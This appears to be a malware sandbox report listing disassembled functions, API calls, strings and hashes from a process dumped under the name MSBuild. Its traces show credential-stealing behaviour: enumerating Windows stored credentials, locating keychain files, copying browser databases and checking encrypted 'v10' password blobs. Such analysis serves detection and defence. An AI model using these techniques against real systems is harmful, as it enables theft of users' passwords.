                                                                                                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                            • free.MSVCRT ref: 00418803
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1355100292-0
                                                                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$FirstNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1690352074-0
                                                                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoSystemmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3558857096-0
                                                                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                                                                            • memset.MSVCRT ref: 00445725
                                                                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                                                                            • memset.MSVCRT ref: 00445755
                                                                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                            • memset.MSVCRT ref: 00445986
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                            • API String ID: 2263259095-3798722523
                                                                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                                                            • API String ID: 2744995895-28296030
                                                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                            • String ID: chp$v10
                                                                                                                                            • API String ID: 4165125987-2783969131
                                                                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                            • free.MSVCRT ref: 0040E49A
                                                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E3EC
                                                                                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E407
                                                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E422
                                                                                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E43D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                            • API String ID: 3849927982-2252543386
                                                                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3715365532-3916222277
                                                                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->638 659->654 660->650 662->641
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
